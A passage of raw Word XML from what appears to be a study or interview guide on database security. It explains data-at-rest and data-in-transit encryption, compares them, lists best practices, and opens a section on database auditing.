          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How It Works</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483C85E5" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="438"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encryption Algorithms</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Uses symmetric (e.g., AES) or asymmetric (e.g., RSA) encryption algorithms to encode the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E98FE3" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="438"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Encryption keys must be managed securely, and access to keys should be restricted to authorized personnel or systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F41CE4F" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:p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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A94742E" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="439"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encrypting files and folders on a disk drive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C39ED7D" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="439"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encrypting entire databases or specific columns in a database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0558BA04" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="439"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encrypting backup files to ensure they are secure when stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E4EA9E" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data-in-Transit Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64098DF5" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:p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Data-in-transit encryption refers to encrypting data that is being transmitted over a network, such as the internet, a local network, or a private connection. This ensures that data remains confidential and secure while being transferred from one location to another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D97D2AF" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:p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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247A65E2" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="440"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Protect Data During Transmission</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensures that data cannot be intercepted, read, or tampered with while it is being transmitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A34E92" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="440"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Prevent Eavesdropping and Man-in-the-Middle Attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Protects data from being captured by attackers who intercept network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4209E4BF" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="440"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Maintain Data Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensures that data is not altered during transmission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10994596" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How It Works</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630F48EE" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encryption Protocols</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Uses protocols such as TLS (Transport Layer Security) or SSL (Secure Sockets Layer) to encrypt data during transmission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6DD090" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Public and Private Keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Employs asymmetric encryption for key exchange and symmetric encryption for data transfer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE7190C" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:p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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB8E169" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HTTPS for secure web communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAC6352" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encrypted email communication (e.g., using PGP or S/MIME).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266B031A" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="442"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>VPNs (Virtual Private Networks) that encrypt all network traffic between a client and a server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7262CCC4" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Comparison and Interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5356709D" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Data-at-rest encryption focuses on securing data stored on physical media, while data-in-transit encryption focuses on securing data during transmission over networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362B2927" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Data-at-rest encryption is typically implemented at the file system or database level, while data-in-transit encryption is implemented at the network protocol or application level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D68926" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="443"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Complementary Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Both types of encryption are complementary and necessary for a comprehensive data security strategy. Data-at-rest encryption protects against unauthorized access if storage is compromised, while data-in-transit encryption protects against interception and tampering during transmission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31583153" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6911AC" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="444"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use strong key management practices to secure and rotate encryption keys regularly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD7C921" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="444"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encryption Standards</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Follow industry standards and best practices for encryption algorithms and protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4BC212" w14:textId="77777777" w:rsidR="00352DF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00352DF7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="444"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Regular Audits</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Perform regular security audits and vulnerability assessments to ensure that encryption mechanisms are effective and up-to-date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2154739F" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD6079A" w14:textId="74198367" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_Toc178383320"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain the concept of database auditing.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w14:paraId="46A405FE" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Database auditing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to the process of tracking and reviewing database activities to ensure data integrity, security, and compliance with policies and regulations. It involves recording various types of database operations and access patterns, analyzing these records to identify potential issues, and ensuring that the database environment is secure and properly managed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D86AFE0"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Key Objectives of Database Auditing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5315EC9B" w14:textId="77777777" w:rsidR="0086717A" w:rsidRPr="00DA2F32" w:rsidRDefault="0086717A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="445"/>
        </w:numPr>
